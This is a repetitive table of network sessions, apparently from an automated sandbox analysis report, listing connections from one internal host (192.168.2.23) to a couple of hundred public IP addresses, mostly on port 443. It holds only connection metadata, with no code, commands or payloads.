                                            10362192.168.2.234573084.117.74.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10363192.168.2.2346356183.173.193.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10364192.168.2.2349198187.98.29.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10365192.168.2.235472269.181.114.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10366192.168.2.2350734195.59.168.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10367192.168.2.2351014162.254.205.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10368192.168.2.2346234207.141.47.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10369192.168.2.235565460.176.252.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10370192.168.2.2355372209.228.221.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10371192.168.2.236076836.9.54.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10372192.168.2.235555090.184.175.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10373192.168.2.233472262.241.175.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10374192.168.2.234388474.113.85.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10375192.168.2.233856043.197.191.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10376192.168.2.2334362150.138.133.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10377192.168.2.233703653.190.142.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10378192.168.2.234050484.39.247.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10379192.168.2.2358196178.217.217.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10380192.168.2.2350860160.79.117.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10381192.168.2.235852259.123.102.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10382192.168.2.2337924218.190.239.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10383192.168.2.23564444.112.122.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10384192.168.2.2356966182.150.79.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10385192.168.2.2345468166.67.41.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10386192.168.2.2350276149.68.201.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10387192.168.2.2338284161.166.255.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10388192.168.2.2333882165.162.255.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10389192.168.2.2342182120.182.4.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10390192.168.2.2340644120.186.157.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10391192.168.2.233501848.71.6.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10392192.168.2.234221675.229.74.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10393192.168.2.2343300193.51.13.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10394192.168.2.234036012.101.148.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10395192.168.2.236032283.156.67.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10396192.168.2.2348576187.133.186.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10397192.168.2.234481231.250.201.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10398192.168.2.233305486.181.241.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10399192.168.2.233847447.52.154.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10400192.168.2.233708447.186.63.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10401192.168.2.236020296.171.4.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10402192.168.2.2359114142.82.215.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10403192.168.2.235847681.137.216.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10404192.168.2.2348362193.47.168.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10405192.168.2.2349746168.18.218.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10406192.168.2.2351100156.216.230.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10407192.168.2.235285838.119.84.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10408192.168.2.235762078.170.187.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10409192.168.2.233890020.89.100.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10410192.168.2.235524679.59.199.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10411192.168.2.2337464208.254.164.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10412192.168.2.234123451.202.74.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10413192.168.2.2348108183.207.32.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10414192.168.2.234943634.232.82.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10415192.168.2.2353286216.149.253.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10416192.168.2.233566676.248.65.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10417192.168.2.233422846.165.106.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10418192.168.2.2357488168.176.65.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10419192.168.2.2334528109.211.250.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10420192.168.2.2342018213.24.108.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10421192.168.2.2354264171.235.87.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10422192.168.2.2344780110.229.104.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10423192.168.2.2342312147.255.5.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10424192.168.2.2356282128.233.128.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10425192.168.2.2349912190.207.49.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10426192.168.2.2359730100.130.135.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10427192.168.2.233493483.126.145.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10428192.168.2.234386880.114.148.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10429192.168.2.233826857.110.242.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10430192.168.2.2348982207.233.4.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10431192.168.2.2338696102.42.76.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10432192.168.2.2336096171.87.239.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10433192.168.2.23340882.121.23.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10434192.168.2.235643669.132.75.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10435192.168.2.2355840176.8.95.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10436192.168.2.2349750176.17.75.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10437192.168.2.234173089.165.54.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10438192.168.2.2346962101.34.52.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10439192.168.2.234706618.132.225.858080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10440192.168.2.2355766188.213.165.1828080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10441192.168.2.2352920188.162.93.1138080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10442192.168.2.2332838192.33.90.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10443192.168.2.234246899.217.105.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10444192.168.2.23398922.183.248.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10445192.168.2.235416297.90.36.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10446192.168.2.235157872.56.76.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10447192.168.2.2346998173.89.48.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10448192.168.2.2348890125.63.124.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10449192.168.2.23488741.116.178.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10450192.168.2.235034054.112.164.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10451192.168.2.2348558219.235.92.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10452192.168.2.234779865.167.60.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10453192.168.2.236015278.156.46.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10454192.168.2.2347010139.116.222.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10455192.168.2.233945074.2.20.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10456192.168.2.2357710189.210.91.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10457192.168.2.2336756116.24.123.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10458192.168.2.234939877.93.48.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10459192.168.2.233558880.167.135.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10460192.168.2.234818034.86.52.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10461192.168.2.2338058196.135.133.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10462192.168.2.2349668213.213.244.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10463192.168.2.2345082101.209.124.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10464192.168.2.2345722197.53.181.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10465192.168.2.2358028162.6.100.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10466192.168.2.235098019.48.134.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10467192.168.2.235086279.10.242.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10468192.168.2.2334572155.162.192.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10469192.168.2.233894447.171.130.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10470192.168.2.234154232.91.21.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10471192.168.2.235054472.116.55.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10472192.168.2.2353512110.162.104.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10473192.168.2.235033047.221.119.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10474192.168.2.2351602161.136.206.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10475192.168.2.2340628115.189.7.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10476192.168.2.2335380144.120.116.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10477192.168.2.2332930177.160.108.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10478192.168.2.235792678.85.41.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10479192.168.2.2337952181.246.62.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10480192.168.2.2352200212.127.164.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10481192.168.2.233999691.222.184.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10482192.168.2.23455189.203.199.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10483192.168.2.2353224109.248.195.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10484192.168.2.2333724175.165.39.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10485192.168.2.235021893.101.146.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10486192.168.2.233766066.119.246.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10487192.168.2.2333842151.188.100.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10488192.168.2.2359944103.136.182.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10489192.168.2.2343198167.180.32.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10490192.168.2.236024440.245.204.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10491192.168.2.235548479.36.56.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10492192.168.2.234526086.117.95.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10493192.168.2.235656244.56.145.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10494192.168.2.2349812211.115.151.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10495192.168.2.234901295.45.25.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10496192.168.2.2336646132.43.79.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10497192.168.2.235754479.41.126.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10498192.168.2.2352892109.148.233.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10499192.168.2.2340884205.255.218.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10500192.168.2.2342612192.0.118.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10501192.168.2.2358324186.110.135.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10502192.168.2.2346762212.0.118.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10503192.168.2.234031447.142.205.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10504192.168.2.2344928151.248.142.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10505192.168.2.2338228109.130.117.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10506192.168.2.2358042154.35.236.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10507192.168.2.2339930113.102.104.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10508192.168.2.233623623.42.192.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10509192.168.2.233359245.154.222.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10510192.168.2.2354258163.42.157.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10511192.168.2.2337988100.217.75.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10512192.168.2.2351502124.161.28.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10513192.168.2.2335672136.15.77.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10514192.168.2.233987280.157.246.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10515192.168.2.235822891.121.239.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10516192.168.2.2348504191.240.208.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10517192.168.2.235179081.159.146.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10518192.168.2.2341712156.79.157.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10519192.168.2.2334836151.103.241.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10520192.168.2.233606493.144.74.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10521192.168.2.2359744162.230.13.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10522192.168.2.2359960137.37.150.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10523192.168.2.235267881.247.214.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10524192.168.2.2340590179.148.56.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10525192.168.2.2360580155.44.234.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10526192.168.2.234919839.145.128.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10527192.168.2.2338734121.34.180.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10528192.168.2.2341640140.72.98.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10529192.168.2.233680213.161.76.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10530192.168.2.2356232205.28.165.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10531192.168.2.2355026149.145.95.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10532192.168.2.2337572166.102.26.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10533192.168.2.2337962190.47.211.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10534192.168.2.2344512126.105.251.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10535192.168.2.2349240141.246.247.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10536192.168.2.233404662.68.215.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10537192.168.2.234695490.181.108.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10538192.168.2.2348818170.219.175.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10539192.168.2.2333034183.135.89.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10540192.168.2.2339794116.68.24.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10541192.168.2.2334742142.146.77.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10542192.168.2.2357672207.26.152.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10543192.168.2.2358932156.158.126.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10544192.168.2.234072872.197.162.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10545192.168.2.2336788106.30.119.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10546192.168.2.2349552175.227.195.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10547192.168.2.2354664212.111.139.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10548192.168.2.233711854.253.12.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10549192.168.2.235767872.182.30.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10550192.168.2.2345296120.183.115.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10551192.168.2.234602469.19.225.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10552192.168.2.2338376105.231.216.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10553192.168.2.2332992209.126.196.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10554192.168.2.235974817.25.37.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10555192.168.2.235366218.137.241.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10556192.168.2.23471302.74.155.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10557192.168.2.23597329.36.12.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10558192.168.2.2341220156.144.129.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10559192.168.2.2342104167.23.203.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10560192.168.2.233659696.99.158.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10561192.168.2.2334808154.74.250.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10562192.168.2.235388285.229.209.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10563192.168.2.2360940159.52.36.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10564192.168.2.2353838149.17.27.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10565192.168.2.2333372143.133.6.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10566192.168.2.234160861.33.212.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10567192.168.2.2358028133.206.235.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10568192.168.2.2359974195.10.6.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10569192.168.2.235609425.121.185.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10570192.168.2.2344830210.233.26.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10571192.168.2.2338626200.21.59.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10572192.168.2.2339876150.163.100.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10573192.168.2.2351520206.216.151.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10574192.168.2.2354298120.195.89.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10575192.168.2.233302441.130.34.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10576192.168.2.2346076151.3.144.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10577192.168.2.234030066.62.46.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10578192.168.2.235630687.224.198.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10579192.168.2.2356466152.180.25.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10580192.168.2.233887812.30.35.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10581192.168.2.2352694207.181.39.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10582192.168.2.234555449.49.234.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            10583192.168.2.2355158107.212.52.127443
                                            TimestampBytes transferredDirectionData


